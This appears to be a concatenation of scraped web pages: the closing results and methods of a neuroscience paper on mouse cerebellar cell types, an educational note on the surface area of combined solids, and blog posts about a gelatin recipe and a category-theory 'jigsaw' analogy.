caused by an initial outward current followed by a longer lasting inward current (Fig. 3e, middle left). A summary of the glutamate-evoked currents (Fig. 3e, right) suggests that the graded nature of the molecular properties of UBCs may lead to graded electrical response properties. To link the functional and molecular continua more directly, we recorded from cells treated with agonists of mGluR1 (Grm1) or mGluR2 (Grm2) (Fig. 3f). Responses were graded across the UBC population, with a significant number of cells that responded to both agonists (Fig. 3f, Extended Data Fig. 5). This suggests that the biphasic response profile probably corresponds to the molecular continuum defined by snRNA-seq. Further studies are needed to determine the relationship between these diverse responses to applied agonists, and the responses of the cells to mossy fibre activation. Two discrete MLI subtypes MLIs are spontaneously active interneurons that inhibit PCs as well as other MLIs. MLIs are canonically subdivided into stellate cells located in the outer third of the molecular layer, and basket cells located in the inner third of the molecular layer that synapse onto PC somata and form specialized contacts known as pinceaus, which ephaptically inhibit PCs. Many MLIs, particularly those in the middle of the molecular layer, share morphological features with both basket and stellate cells19. Thus, MLIs are thought to represent a single functional and morphological continuum. Our clustering analysis of MLIs and PLIs, by contrast, identified two discrete populations of MLIs. The first population, ‘MLI1’, uniformly expressed Lypd6, Sorcs3 and Ptprk (Figs. 1c, 4a). The second population, ‘MLI2’, was highly molecularly distinct from MLI1, and expressed numerous markers that are also found in PLIs, such as Nxph1 and Cdh22 (Fig. 4a). Single-molecule fluorescence in situ hybridization (smFISH) experiments with Sorcs3 and Nxph1 showed that the markers were entirely mutually exclusive (Fig. 4b, c). A cross-species analysis with 14,971 human MLI and PLI profiles demonstrated that the MLI1 and MLI2 distinction is evolutionarily conserved (Extended Data Fig. 4c, d). To examine the developmental specification of these two populations, we clustered 79,373 total nuclei from peri- and postnatal mice across several time points (ranging from embryonic day (E) 18 to postnatal day (P) 16). From a cluster of 5,519 GABA (γ-aminobutyric acid)-producing neuron progenitors, marked by the expression of canonical markers Tfap2b, Ascl1 and Pax227,28 (Methods, Extended Data Fig. 6a, b), we were able to distinguish developmental trajectories that corresponded to the MLI1 (Sorcs3-positive) and MLI2 (Nxph1-positive, Klhl1-negative) populations, with differentiation of the two types beginning at P4 and largely complete by P16 (Fig. 4d, e, Extended Data Fig. 6a). Although both populations originate from a single group of progenitors, trajectory analysis revealed several lineage-specific markers (Extended Data Fig. 6c–e). Among the MLI2 trajectory markers, we identified genes such as Fam135b, the expression of which persisted into adulthood, and Fos, which is only transiently differentially expressed between the MLI1 and MLI2 trajectories (Fig. 4e, Extended Data Fig. 6e, f). This high expression of several immediate early genes (Extended Data Fig. 6f) selectively in early MLI2 cells could indicate that differential activity is associated with MLI2 specification. MLI1s and MLI2s were present throughout the entire molecular layer, which indicates that the distinction between MLI1 and MLI2 does not correspond to the canonical basket and stellate distinction (Extended Data Fig. 7a). To understand the morphological, physiological and molecular characteristics of the MLI populations better, we developed a pipeline to record from individual MLIs in brain slices, image their morphologies, and then ascertain their molecular MLI1 and MLI2 identities by smFISH (Methods, Fig. 4f). Consistent with the marker analysis (Fig. 4a), MLI1s had a stellate morphology in the distal third of the molecular layer, whereas MLI1s located near the PC layer had a basket morphology, with contacts near PC initial segments (Fig. 4f, Extended Data Fig. 7b). We next examined whether MLI2s, in which we could not identify systematic molecular heterogeneity, had graded morphological properties. MLI2s in the distal third of the molecular layer also had stellate cell morphology, whereas MLI2s near the PC layer had a distinct morphology and appeared to form synapses preferentially near the PC layer (Extended Data Fig. 7b). Although further studies are needed to determine whether MLI2s form pinceaus, it is clear that both MLI1 and MLI2 showed a similar continuum in their morphological properties. The electrical characteristics of MLI1s and MLI2s also showed numerous distinctions. The average spontaneous firing rate was significantly higher for MLI1s than for MLI2s (Mann–Whitney test, P = 0.0015) (Fig. 4g), and the membrane resistance (Rm) of MLI1s was lower than that of MLI2s (Fig. 4g). In addition, we found that MLI2s were more excitable than MLI1s (Fig. 4h), and displayed a stronger hyperpolarization-activated current (Extended Data Fig. 8). MLIs are known to be electrically coupled via gap junctions29, but it is not clear whether this is true for both MLI1s and MLI2s. In the cerebral cortex and some other brain regions, interneurons often electrically couple selectively to neurons of the same type, but not other types30,31. We therefore examined whether this also applies to MLI1s and MLI2s. The expression of Gjd2, the gene encoding the dominant gap junction protein in MLIs32, was found in MLI1s but not MLI2s, both in our single-nucleus data (Fig. 4i) and by smFISH (Fig. 4j, k), which suggests potential differences in electrical coupling. Notably, the two clusters of Golgi cells, another interneuron type known to be electrically coupled33,34, differentially expressed many of the same markers, including Sorcs3, Gjd2 and Nxph1 in both human and mouse (Extended Data Figs. 4e, f, 9). Action potentials in coupled MLIs produce small depolarizations known as spikelets that are thought to promote synchronous activity between MLIs29. We therefore investigated whether spikelets are present in MLI1s and absent in MLI2s. Consistent with the gene expression profile, we observed spikelets in 71% of MLI1s and not in MLI2s (Fig. 4l, m; P < 0.001, Fisher’s exact test). These findings suggest that most MLI1s are coupled to other MLI1s by gap junctions, whereas MLI2s show no electrical coupling to other MLIs. Conclusions In this Article, we used high-throughput, region-specific transcriptome sampling to build a comprehensive taxonomy of cell types in the mouse cerebellar cortex, and quantify spatial variation across individual regions. Our joint analyses with post mortem human samples indicated that the neuronal populations defined in mouse were generally conserved in human (Extended Data Fig. 4), consistent with a recent comparative analysis in the cerebral cortex35. We find considerably more regional specialization in PCs—especially in posterior lobules—than was previously recognized. These PC subtypes overlap with greater local abundances in UBCs and in distinct specializations in granule cells, which indicates a higher degree of regional circuit heterogeneity than previously thought. Our dataset is freely available to the neuroscience community (https://portal.nemoarchive.org/; https://singlecell.broadinstitute.org), facilitating functional characterization of these populations, many of which are entirely novel. One of the biggest challenges facing the comprehensive cell typing of the brain is the correspondence problem36: how to integrate definitions of cell types on the basis of the many modalities of measurement used to characterize brain cells. We found success by first defining populations using systematic molecular profiling, and then relating these populations to physiological and morphological features using targeted, joint analyses of individual cells. We were surprised that the cerebellar MLIs—one of the first sets of neurons to be characterized more than 130 years ago37—are in fact composed of two molecularly and physiologically discrete populations, that each shows a similar morphological continuum along the depth axis of the molecular layer. As comprehensive cell typing proceeds across other brain regions, we expect the emergence of similar basic discoveries that challenge and extend our understanding of cellular specialization in the nervous system. Methods Animals Nuclei suspensions for mouse (C57BL/6J, Jackson Labs) cerebellum profiles were generated from 2 female and 4 male adult mice (60 days old), 1 male E18 mouse, 1 male P0 (newborn) mouse, 1 female P4 (4 days old) mouse, 1 female P8, 2 male P12 and 2 female P16 mice. Adult mice were group-housed with a 12-h light-dark schedule and allowed to acclimate to their housing environment for two weeks after arrival. Timed pregnant mice were received and euthanized to yield E18 mice 6 days after arrival. Newborn mice were housed as individual litters for up to 16 days. All experiments were approved by and in accordance with Broad IACUC protocol number 012-09-16. Brain preparation At E18, P0, P4, P8, P12, P16 and P60, C57BL/6J mice were anaesthetized by administration of isoflurane in a gas chamber flowing 3% isoflurane for 1 min. Anaesthesia was confirmed by checking for a negative tail and paw pinch response. Mice were moved to a dissection tray and anaesthesia was prolonged via a nose cone flowing 3% isoflurane for the duration of the procedure. Transcardial perfusions were performed on adult, pregnant (E18), P8, P12 and P16 mice with ice-cold pH 7.4 HEPES buffer containing 110 mM NaCl, 10 mM HEPES, 25 mM glucose, 75 mM sucrose, 7.5 mM MgCl2, and 2.5 mM KCl to remove blood from the brain. P0 and P4 mice were unperfused. The brain was removed from P60, P8, P12 and P16 mice and frozen for 3 min in liquid nitrogen vapour. E18, P0 and P4 mice were sagittally bisected after similarly freezing their brains in situ. All tissue was moved to −80 °C for long-term storage. A detailed protocol is available at protocols.io (https://doi.org/10.17504/protocols.io.bcbrism6). Generation of cerebellar nuclei profiles Frozen adult mouse brains were securely mounted by the frontal cortex onto cryostat chucks with OCT embedding compound such that the entire posterior half including the cerebellum and brainstem were left exposed and thermally unperturbed. Dissection of each of 16 cerebellar vermal and cortical lobules was performed by hand in the cryostat using an ophthalmic microscalpel (Feather safety Razor P-715) pre-cooled to −20 °C and donning four surgical loupes. Whole E18, P0, P4, P8, P12 and P16 mouse cerebella were similarly curated by dissecting rhombomeric cerebellar rudiments from sagittal frozen brain hemispheres using a pre-cooled 1-mm disposable biopsy punch (Integra Miltex). Each excised tissue dissectate was placed into a pre-cooled 0.25 ml PCR tube using pre-cooled forceps and stored at −80 °C. Nuclei were extracted from this frozen tissue using gentle, detergent-based dissociation, according to a protocol available at protocols.io (https://doi.org/10.17504/protocols.io.bck6iuze) adapted from one provided by the McCarroll laboratory (Harvard Medical School), and loaded into the 10x Chromium V3 system. Reverse transcription and library generation were performed according to the manufacturer’s protocol. Floating slice hybridization chain reaction on acute slices Acute cerebellar slices containing Alexa 594-filled patched cells were fixed as described and stored in 70% ethanol at 4 °C until hybridization chain reaction (HCR). They were then subjected to a ‘floating slice HCR’ protocol in which the recorded cells could be simultaneously re-imaged in conjunction with HCR expression analysis in situ and catalogued as to their positions in the cerebellum. A detailed protocol (https://doi.org/10.17504/protocols.io.bck7iuzn) was performed using the following HCR probes and matching hairpins purchased from Molecular Instruments: glutamate metabotropic receptor 8 (Grm8) lot number PRC005, connexin 36 (Gjd2) lot number PRD854 and PRA673, cadherin22 (Cdh22) lot number PRC011, neurexophilin 1 (Nxph1) lot number PRC675 and PRC466, leucine-rich glioma-inactivated protein 2 (Lgi2) lot number PRC012, somatostatin (Sst) lot number PRA213 and sortilin related VPS10 domain containing receptor 3 (Sorcs3) lot number PRC004. Amplification hairpins used were type B1, B2 and B3 in 488 nm, 647 nm and 546 nm respectively. Patch fill and HCR co-imaging After floating-slice HCR, slices were mounted between no.1 coverslips with antifade compound (ProLong Glass, Invitrogen) and images were collected on an Andor CSU-X spinning disk confocal system coupled to a Nikon Eclipse Ti microscope equipped with an Andor iKon-M camera. The images were acquired with an oil immersion objective at 60×. The Alexa 594 patched cell backfill channel (561 nm) plus associated HCR probe/hairpin channels (488 nm and 647 nm) were projected through a 10–20-μm thick z-series so that an unambiguous determination of the association between the patch-filled cell and its HCR gene expression could be made. Images were processed using Nikon NIS Elements 4.4 and Nikon NIS AR. Human brain and nuclei processing Human donor tissue was supplied by the Human Brain and Spinal Fluid Resource Center at UCLA, through the NIH NeuroBioBank. This work was determined by the Office of Research Subjects Protection at the Broad Institute not to meet the definition of human subjects research (project ID NHSR-4235). Nuclei suspensions from human cerebellum were generated from two neuropathologically normal control cases—one female tissue donor, aged 35, and one male tissue donor, aged 36. These fresh frozen tissues had post mortem intervals of 12 and 13.5 h respectively, and were provided as whole cerebella cut into four coronal slabs. A sub-dissection of frozen cerebellar lobules was performed on dry ice just before 10x processing and nuclei were extracted from this frozen tissue using gentle, detergent-based dissociation, according to a protocol available at protocols.io (https://doi.org/10.17504/protocols.io.bck6iuze). Electrophysiology experiments Acute parasagittal slices were prepared at 240-μm thickness from wild-type mice aged P30–P50. Mice were anaesthetized with an intraperitoneal injection of ketamine (10 mg kg−1), perfused transcardially with an ice-cold solution containing (in mM): 110 choline chloride, 7 MgCl2, 2.5 KCl, 1.25 NaH2PO4, 0.5 CaCl2, 25 glucose, 11.5 sodium ascorbate, 3 sodium pyruvate, 25 NaHCO3, 0.003 (R)-CPP, equilibrated with 95% O2 and 5% CO2. Slices were cut in the same solution and were then transferred to artificial cerebrospinal fluid (ACSF) containing (in mM) 125 NaCl, 26 NaHCO3, 1.25 NaH2PO4, 2.5 KCl, 1 MgCl2, 1.5 CaCl2 and 25 glucose equilibrated with 95% O2 and 5% CO2 at approximately 34 °C for 30 min. Slices were then kept at room temperature until recording. All UBC recordings were done at 34–36 °C with (in μM) 2 (R)-CPP, 5 NBQX, 1 strychnine, 10 SR95531 (gabazine) and 1.5 CGP in the bath to isolate metabotropic currents. Loose cell-attached recordings were made with ACSF-filled patch pipettes of 3–5 MΩ resistance. Whole-cell voltage-clamp recordings were performed while holding the cell at −70 mV with an internal containing (in mM): 140 KCl, 4 NaCl, 0.5 CaCl2, 10 HEPES, 4 MgATP, 0.3 NaGTP, 5 EGTA 5, and 2 QX-314, pH adjusted to 7.2 with KOH. Brief puffs of glutamate (1 mM for 50 ms at 5 psi) were delivered using a Picospritzer II (General Valve Corp.) in both cell-attached and whole-cell configuration to assure consistent responses. The heat map of current traces from all cells are sorted by the score over the first principal axis after singular value decomposition (SVD) of recordings over all cells. For whole-cell recordings with pharmacology, we used an K-methanesulfonate internal containing (in mM): 122 K-methanesulfonate, 9 NaCl, 9 HEPES, 0.036 CaCl2, 1.62 MgCl2, 4 MgATP, 0.3 GTP (Tris salt), 14 creatine phosphate (Tris salt), and 0.18 EGTA, pH 7.4. A junction potential of −8 mV was compensated for during recording. 300nM TTX was added to the ACSF in conjunction with the synaptic blockers listed above. Three pipettes filled with ACSF containing 1 mM glutamate, 100 μM DHPG or 1 μM LY354740 were positioned within 20 μm of the recorded cell. Pressure applications of each agonist were delivered at 10 psi with durations of 40–50 ms. Agonist applications were separated by 30 s. Two to three trials were collected for each agonist. MLI recordings were performed at approximately 32 °C with an internal solution containing (in mM) 150 K-gluconate, 3 KCl, 10 HEPES, 3 MgATP, 0.5 GTP, 5 phosphocreatine-tris2 and 5 phosphocreatine-Na2, 2 mg ml−1 biocytin and 0.1 Alexa 594 (pH adjusted to 7.2 with KOH, osmolality adjusted to 310 mOsm kg−1). Visually guided whole-cell recordings were obtained with patch pipettes of around 4 MΩ resistance pulled from borosilicate capillary glass (BF150-86-10, Sutter Instrument). Electrophysiology data was acquired using a Multiclamp 700B amplifier (Axon Instruments), digitized at 20 kHz and filtered at 4 kHz. For isolating spikelets in MLI recordings, cells were held at −65 mV in voltage clamp and the following receptor antagonists were added to the solution (in μM) to block synaptic currents: 2 (R)-CPP, 5 NBQX, 1 strychnine, 10 SR95531 (gabazine), 1.5 CGP. All drugs were purchased from Abcam and Tocris. To obtain an input-output curve, MLIs were maintained at 60–65 mV with a constant hyperpolarizing current, and 250 ms current steps ranging from −30 pA to +100 pA were injected in 10 pA increments. To activate the hyperpolarization-evoked current (Ih), MLIs were held at −65 mV and a 30 pA hyperpolarizing current step of 500 ms duration was injected. The amplitude of Ih was calculated as the difference between the maximal current evoked by the hyperpolarizing current step and the average steady-state current at the end (480–500 ms) of the current step. Capacitance and input resistance (Ri) were determined using a 10 pA, 50 ms hyperpolarizing current step. To prevent excessive dialysis and to ensure successful detection of mRNAs in the recorded cells, the total duration of recordings did not exceed 10 min. Acquisition and analysis of electrophysiological data were performed using custom routines written in MATLAB (Mathworks), IgorPro (Wavemetrics), or AxoGraphX. Data are reported as median ± interquartile range, and statistical analysis was carried out using the Mann–Whitney or Fisher’s exact test, as indicated. Statistical significance was assumed at P < 0.05. To determine the presence of spikelets, peak detection was used to generate event-triggered average waveforms with thresholds based on the mean absolute deviation (MAD) of the raw trace. Spikelet recordings were scored for the presence of spikelets blind to the molecular identity of the cells. The analysis was restricted to cells recorded in the presence of synaptic blockers. Imaging and analysis MLIs were filled with 100 μM Alexa-594 via patch pipette to visualize their morphology using two-photon imaging. After completion of the electrophysiological recordings the patch electrode was retracted slowly and the cell resealed. We used a custom-built two-photon laser-scanning microscope with a 40×, 0.8 numerical aperture (NA) objective (Olympus Optical) and a pulsed two-photon laser (Chameleon or MIRA 900, Coherent, 800 nm excitation). DIC images were acquired at the end of each experiment and locations of each cell within the slice were recorded. Two-photon images were further processed in ImageJ. Tissue fixation of acute slices After recording and imaging, cerebellar slices were transferred to a well-plate and submerged in 2–4% PFA in PBS (pH 7.4) and incubated overnight at 4 °C. Slices were then washed in PBS (3 × 5 min) and then kept in 70% ethanol in RNase-free water until HCR was performed. Sequencing reads from mouse cerebellum experiments were demultiplexed and aligned to a mouse (mm10) premrna reference using CellRanger v3.0.2 with default settings. Digital gene expression matrices were generated with the CellRanger count function. Sequencing reads from human cerebellum experiments were demultiplexed and aligned to a human (hg19) premrna reference using the Drop-seq alignment workflow2, which was also used to generate the downstream digital gene expression matrices. Estimation of adequate rare cell type detection To estimate the probability of sufficiently sampling rare cell types in the cerebellum as a function of total number of nuclei sampled, we used the approach proposed by the Satija laboratory (https://satijalab.org/howmanycells), with the assumption of at most 10 very rare cell types, each with a prevalence of 0.15%. We derived this minimum based on the observed prevalences of the two rarest cell types we identified (OPC_4, Purkinje_Aldoc_2). We set 70 cells as the threshold for sufficient sampling, and calculated the overall probability as a negative binomial (NB) density: $${\rm{NB}}{(k;n,p)}^{m}$$ in which k = 70, P = 0.0015, m = 10, and n represents the total number of cells sampled. Cell type clustering and annotation After generation of digital gene expression matrices as described above, we filtered out nuclei with fewer than 500 UMIs. We then performed cell type annotation iteratively through a number of rounds of dimensionality reduction, clustering, and removal of putative doublets and cells with high mitochondrial expression. For the preliminary clustering step, we performed standard preprocessing (UMI normalization, highly variable gene selection, scaling) with Seurat v2.3.4 as previously described38. We used principal component analysis (PCA) with 30 components and Louvain community detection with resolution 0.1 to identify major clusters (resulting in 34 clusters). At this stage, we merged several clusters (primarily granule cell clusters) based on shared expression of canonical cell type markers, and removed one cluster whose top differentially expressed genes were mitochondrial (resulting in 11 clusters). For subsequent rounds of cluster annotation within these major cell type clusters, we applied a variation of the LIGER workflow previously described12, using integrative non-negative matrix factorization (iNMF) to limit the effects of sample- and sex-specific gene expression. In brief, we normalized each cell by the number of UMIs, selected highly variable genes7 and spatially variable genes (see section below), performed iNMF, and clustered using Louvain community detection (omitting the quantile normalization step). Clusters whose top differentially expressed genes indicated contamination from a different cell type or high expression of mitochondrial genes were removed during the annotation process, and not included in subsequent rounds of annotation. This iterative annotation process was repeated until no contaminating clusters were identified in a round of clustering. Differential expression analysis within rounds of annotation was performed with the Wilcoxon rank sum test using Seurat’s FindAllMarkers function. Comprehensive differential expression analysis across all 46 final annotated clusters was performed using the wilcoxauc function from the presto package39. A full set of parameters used in the LIGER annotation steps and further details can be found in Supplementary Table 4. For visualization as in Fig. 1b, we merged all annotated high-quality nuclei and repeated preliminary preprocessing steps before performing UMAP using 25 principal components. Integrated analysis of human and mouse data After generation of digital gene expression matrices for the human nuclei profiles, we filtered out nuclei with fewer than 500 UMIs. We then performed a preliminary round of cell type annotation using the standard LIGER workflow (integrating across batches) to identify the primary human interneuron populations (UBCs, MLIs and PLIs, Golgi cells, granule cells; based on the same markers as in Supplementary Table 1). We repeated an iteration of the same workflow for the four cell populations specified above (with an additional quantile normalization step) in order to identify and remove putative doublet and artefactual populations. Finally, we performed iNMF metagene projection as previously described40 to project the human datasets into latent spaces derived from the corresponding mouse cell type datasets. We then performed quantile normalization and Louvain clustering, assigning joint clusters based on the previously annotated mouse data clusters. For the granule cell joint analysis, we first limited the mouse data to include only the five cerebellar regions sampled in human data collection (lobules II, VII, VIII, IX and X). For the Golgi cell joint analysis, we performed iNMF (integrating across species), instead of metagene projection. Spatially variable gene selection To identify genes with high regional variance, we first computed the log of the index of dispersion (log variance-to-mean ratio, logVMR) for each gene, across each of the 16 lobular regions. Next, we simulated a Gaussian null distribution whose centre was the logVMR mode, found by performing a kernel density estimation of the logVMRs (using the density function in R, followed by the turnpoints function). The standard deviation of the Gaussian was computed by reflecting the values less than the mode across the centre. Genes whose logVMRs were in the upper tail with P < 0.01 (Benjamini–Hochberg adjusted) were ruled as spatially variable. For the granule cell and PC cluster analyses, adjusted P-value thresholds were set to 0.001 and 0.002, respectively. Cluster regional composition testing and lobule enrichment To determine whether the lobule composition of a cluster differs significantly from the corresponding outer level cell type lobule distribution, we used a multinomial test approximated by Pearson’s chi-squared test with k − 1 degrees of freedom, in which k was the total number of lobules sampled (16). The expected number of nuclei for a cluster i and lobule j was estimated as follows: $${E}_{ij}={N}_{i}\times \frac{{N}_{j}}{{\sum }_{j}{N}_{j}}$$ where Ni is the total number of nuclei in cluster i and Nj is the number of nuclei in lobule j (across all clusters in the outer level cell type, as defined below). The resulting P values were FDR-adjusted (Benjamini–Hochberg) using the p.adjust function in R. Lobule enrichment (LE) scores for each cluster i and each lobule j were calculated by: $${{\rm{LE}}}_{ij}=\,\frac{\frac{{n}_{ij}}{{\sum }_{j}{n}_{ij}}}{\frac{{N}_{j}}{{\sum }_{j}{N}_{j}}}$$ in which nij is the observed number of nuclei in cluster i and lobule j, and Nj is the number of nuclei in lobule j (across all clusters in the outer level cell type). For this analysis, we used coarse cell type definitions shown coloured in the Fig. 2a, and merged the PLI clusters. For lobule composition testing and replicate consistency analysis below, we downsampled granule cells to 60,000 nuclei (the next most numerous cell type were the MLI and PLI clusters with 45,767 nuclei). To determine the consistency of lobule enrichment scores across replicates in each region, we designated two sets of replicates by assigning nuclei from the most represented replicate in each region and cluster analysis to ‘replicate 1’ and nuclei from the second most represented replicate in each region to ‘replicate 2’. This assignment was used because not all regions had representation from all individuals profiled, and some had representation from only two individuals. We calculated lobule enrichment scores for each cluster using each of the replicate sets separately; we then calculated the Pearson correlation between the two sets of lobule enrichment scores for each cluster. We would expect correlation to be high for clusters when lobule enrichment is biologically consistent. We note that one cluster (Purkinje_Aldoc_2), was excluded from the replicate consistency analysis as under this design, it had representation from only a single aggregated replicate. However, we confirmed that lobule enrichment for this cluster was strongly consistent with Allen Brain Atlas expression staining (Extended Data Fig. 3c). Continuity of gene expression To characterize molecular variation across cell types, we attempted to quantify the continuity of scaled gene expression across a given cell type pair, ordered by pseudotime rank (calculated using Monocle2). For each gene, we fit a logistic curve to the scaled gene expression values and calculated the maximum slope (m) of the resulting curve, after normalizing for both the number of cells and dynamic range of the logistic fit. To limit computational complexity, we downsampled cell type pairs to 5,000 total nuclei. We fit curves and computed m values for the most significantly differentially expressed genes across five cell type pairs (Fig. 3b). Differentially expressed genes were determined using Seurat’s FindMarkers function. We then plotted the cumulative distribution of m values for the top 200 genes for each cell type pair; genes were selected based on ordering by absolute Spearman correlation between scaled gene expression and pseudotime rank. Trajectory analysis of peri- and postnatal mouse cerebellum data After generation of digital gene expression matrices for the peri- and postnatal mouse profiles, we filtered out nuclei with fewer than 500 UMIs. We applied the LIGER workflow (similarly to the adult mouse data analysis), to identify clusters corresponding to major developmental pathways. We then isolated the cluster corresponding to GABAergic progenitors (marked by expression of Tfap2b and other canonical markers). We performed a second iteration of LIGER iNMF and Louvain clustering on this population and generated a UMAP representation. Using this UMAP representation, we calculated pseudotime ordering and a corresponding trajectory graph with Monocle341. To identify modules of genes which varied along the computed trajectory, we used the graph_test and find_gene_modules functions from Monocle3. Reporting summary Further information on research design is available in the Nature Research Reporting Summary linked to this paper.
2022-10-07 14:02:41
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.39630022644996643, "perplexity": 8437.039654679336}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00086.warc.gz"}
https://www.shaalaa.com/concept-notes/surface-area-combination-solids_1411
# Surface Area of a Combination of Solids #### notes We have already learnt about the surface area and volumes of figures, but in this chapter we will given different combinations of solids. We are known with solids like cylinder, sphere, cone, cuboid, rectangle, square, etc. In this chapter we are suppose to find surface areas of different combinations of solids. Now before we proceed, we must understand what is curved surface area. The solids having curved surface are cone, cylinder. Curved surface area is the outer portion, the area of flat ends of such solids will not be included while calculating Curved surface area. But while calculating Total surface area we must include the area of flat ends of the solids, provided that the solid should not be hollow from inside. Example- 2 cubes each of volume 64 cm^3 are joined end to end. Find the surface area of the resulting cuboid. Solution- Volume   of   cube= 64cm^3 "edge"^3= 64cm^3 "edge of cube" = 3 sqrt 64 cm edge= 4 cm By adding this two cube we get a cuboid So we get dimensions of cuboid as As we have two cube the lenght will be doubled therefore, lenght = 2(4)= 8cm height= 4cm Surface area of cuboid= 2 (lb+bh+hl) = 2  (8 xx 4)+(4 xx 4)+(4 xx 8 ) = 2   (32+16+32) = 2 (80) Surface area of cuboid= 160 cm^2 If you would like to contribute notes or other learning material, please submit them using the button below. #### Video Tutorials We have provided more than 1 series of video tutorials for some topics to help you get a better understanding of the topic. Series 1 Series 2 Series 3 ### Shaalaa.com Surface Area and Volume part 2 (Surface Area) [00:12:18] S
2020-10-29 04:44:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5094084739685059, "perplexity": 2295.0110157585004}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107902745.75/warc/CC-MAIN-20201029040021-20201029070021-00603.warc.gz"}
http://epistle-null.blogspot.com/2012/07/
## Sunday, July 29, 2012 ### From a whisk-user Dear Gelatinifers, I wish to register a complaint; specifically, without endorsing the heresy sometimes wrongly known as "Luddite", it is nonetheless my firmly-held belief that recipes artificially biased in favour of electromechanical mixing apparatus should only be packaged with electromechanical mixing apparatus (and otherwise appear in books describing what they are), not with foodstuffs. I'm sure I shall, after one or two more trials, adapt the method so as not to melt the cream I've just whipped, but I don't see why I should have to use up the whole box of whatever it is you actually sold me, before it is properly useful, after you pretend to suggest a recipe. As it is, I'm rather tempted to just get me a bottle of orange-infused curaçao (or maybe kirsch!) and go back to meringue mousse. a disgruntled cook ## Tuesday, July 17, 2012 ### Jigsaw Dear Crowsfort, I have a jigsaw puzzle. The pieces look like squares $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g\downarrow & \Downarrow & \downarrow h\\ C & \underset{k}{\to} & D \end{array}$ ... actually, $f,g,h,k$ all know what their corners are, so we could leave out the $A,B,C,D$, but this gets distracting. Also, the $\Downarrow$ deserves to have a name, only I can't think of a good way to make it all fit. Which particular $\Downarrow$ a square has in it makes a difference, later! Two pieces sharing an edge fit together, so that $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g\downarrow & \Downarrow & \downarrow h\\ C & \underset{k}{\to} & D \\ C & \overset{k}{\to} & D \\ g'\downarrow & \Downarrow & \downarrow h'\\ E & \underset{l}{\to} & F \end{array}$ make a rectangle $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g\downarrow & \Downarrow & \downarrow h\\ C & \overset{k}{\to} & D \\ g'\downarrow & \Downarrow & \downarrow h'\\ E & \underset{l}{\to} & F \end{array}$ or sometimes $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g\downarrow & & \downarrow h\\ C & \Downarrow & D \\ g'\downarrow & & \downarrow h'\\ E & \underset{l}{\to} & F \end{array}$ and can even be squished down to a square $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g'g\downarrow & \Downarrow & \downarrow h'h\\ E & \underset{l}{\to} & F \end{array}$ which is handy, though we don't often want to do that. The good people who cut out my jigsaw puzzle were very nice, and provided an unlimited supply of various standard shapes, guaranteed to fit certain sorts of corners, so that if anywhere in the puzzle you find $\begin{array}{ccc} & & A \\ & & \downarrow f\\ B & \underset{g}{\to} & C \end{array}$ you can add in a square $\begin{array}{ccc} P_{f,g} & \to & A \\ \downarrow & \lrcorner & \downarrow f\\ B & \underset{g}{\to} & C \end{array}$ and in the same way, if you have $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g \downarrow & & \\ C & & \end{array}$ you can fill it in $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g \downarrow & \ulcorner & \downarrow \\ C & \to & Q_{f,g} \end{array}$ There is one other sort of handy square, looking like $\begin{array}{ccc} A & \overset{f}{\to} & B \\ f\downarrow & = & \downarrow g \\ B & \underset{g}{\to} & C \end{array}$ which lets you go around corners, when it looks like a good idea. These have two further special types, $\begin{array}{ccc} A & \overset{f}{\to} & B \\ f\downarrow & = & \downarrow = \\ B & \underset{=}{\to} & B \end{array}$ ... and there is another of the similar sort that I'm sure you can guess; and there's also vertical and horizontal versions of $\begin{array}{ccc} A & = & A \\ f\downarrow & = & \downarrow f \\ B & \underset{=}{\to} & B \end{array}$ which also happens to be a $\lrcorner$ and a $\ulcorner$. Actually, those last two squares are special cases of these two : $\begin{array}{ccc} A & \overset{f}{\to} & B \\ =\downarrow & = & \downarrow g\\ A & \underset{g f}{\to} & C \end{array}$ and $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g f \downarrow & = & \downarrow g\\ C & \underset{=}{\to} & C \end{array}$ or reflections of them; but most of these two are neithert $\lrcorner$ nor $\ulcorner$. They were also kind enough to suggest a few ways to get started, using a special corner called "$*$", or "the point", though it's not really the point of all this. Still, there's always exactly one edge $A\to *$, no matter what $A$ is, and you can also draw it vertically: $\begin{array}{c} A\\ \downarrow \\ * \end{array}$ The corner $*$ also has another nifty feature, that the collection of edges $* \to A$ might as well be called $A$. There's only one corner, $\{\}$ to which you can't draw an arrow from $*$; but on the other hand, 